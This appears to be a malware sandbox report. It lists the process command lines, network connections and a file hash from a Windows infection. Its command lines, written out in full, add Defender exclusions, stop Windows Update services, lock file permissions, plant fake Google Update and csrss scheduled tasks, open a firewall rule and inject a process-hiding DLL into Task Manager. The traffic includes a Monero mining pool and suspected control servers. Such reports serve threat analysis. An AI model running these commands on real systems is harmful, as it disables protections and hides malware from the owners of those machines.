C:\Users\Admin\AppData\Local\Temp\5227.exe

C:\Users\Admin\AppData\Local\Temp\548A.exe

C:\Users\Admin\AppData\Local\Temp\548A.exe

C:\Users\Admin\AppData\Local\Temp\5556.exe

C:\Users\Admin\AppData\Local\Temp\5556.exe

C:\Users\Admin\AppData\Local\Temp\568F.exe

C:\Users\Admin\AppData\Local\Temp\568F.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2MM263Ua.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2MM263Ua.exe

C:\Users\Admin\AppData\Local\Temp\6045.exe

C:\Users\Admin\AppData\Local\Temp\6045.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa059e46f8,0x7ffa059e4708,0x7ffa059e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa059e46f8,0x7ffa059e4708,0x7ffa059e4718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\83BC.exe

C:\Users\Admin\AppData\Local\Temp\83BC.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\8BBC.exe

C:\Users\Admin\AppData\Local\Temp\8BBC.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1468,4084226594957414341,16671510639444320544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\9A63.exe

C:\Users\Admin\AppData\Local\Temp\9A63.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\9E3C.exe

C:\Users\Admin\AppData\Local\Temp\9E3C.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa059e46f8,0x7ffa059e4708,0x7ffa059e4718

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=548A.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa059e46f8,0x7ffa059e4708,0x7ffa059e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=548A.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,7643038011990742187,8569689097933109085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 5.42.92.88:80 5.42.92.88 tcp
US 8.8.8.8:53 88.92.42.5.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 160.50.123.104.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.92.88:80 5.42.92.88 tcp
FI 77.91.68.52:80 77.91.68.52 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 52.68.91.77.in-addr.arpa udp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
RU 5.42.92.88:80 5.42.92.88 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
IT 185.196.9.65:80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
NL 85.209.176.128:80 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 65.9.196.185.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 api.ip.sb udp
TR 185.216.70.238:37515 tcp
US 104.26.13.31:443 api.ip.sb tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 238.70.216.185.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
N/A 224.0.0.251:5353 udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 8.8.8.8:53 59.82.57.23.in-addr.arpa udp
US 8.8.8.8:53 139.2.85.104.in-addr.arpa udp
US 8.8.8.8:53 mdec.nelreports.net udp
FR 104.123.50.169:443 mdec.nelreports.net tcp
US 8.8.8.8:53 169.50.123.104.in-addr.arpa udp
US 8.8.8.8:53 js.monitor.azure.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.67:443 wcpstatic.microsoft.com tcp
US 13.107.246.67:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 mscom.demdex.net udp
IE 54.72.174.172:443 mscom.demdex.net tcp
US 8.8.8.8:53 microsoftmscompoc.tt.omtrdc.net udp
US 8.8.8.8:53 target.microsoft.com udp
US 8.8.8.8:53 hellouts.fun udp
US 8.8.8.8:53 67.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 172.174.72.54.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 h2o.activebuy.top udp
FI 95.217.243.178:8443 h2o.activebuy.top tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 20.42.73.26:443 browser.events.data.microsoft.com tcp
US 188.114.97.0:80 hellouts.fun tcp
US 20.42.73.26:443 browser.events.data.microsoft.com tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 178.243.217.95.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
FI 77.91.124.55:19071 tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
NL 85.209.176.128:80 tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
FI 77.91.124.55:19071 tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
FI 77.91.124.55:19071 tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
NL 85.209.176.128:80 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 76f4e50b-00f4-4e2d-85b4-7f832c27baaf.uuid.realupdate.ru udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 server10.realupdate.ru udp
US 8.8.8.8:53 stun4.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 74.125.204.127:19302 stun4.l.google.com udp
BG 185.82.216.96:443 server10.realupdate.ru tcp
US 8.8.8.8:53 walkinglate.com udp
US 172.67.212.188:443 walkinglate.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 127.204.125.74.in-addr.arpa udp
US 8.8.8.8:53 96.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 188.212.67.172.in-addr.arpa udp
NL 85.209.176.128:80 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
BG 185.82.216.96:443 server10.realupdate.ru tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.58.224:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 224.58.15.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 118.34.255.51.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
NL 85.209.176.128:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe

MD5 60d075f42035b2177a8fa6cdd957016c
SHA1 004ba7ec6f5a37e396c46cc116d90e017c4ed375
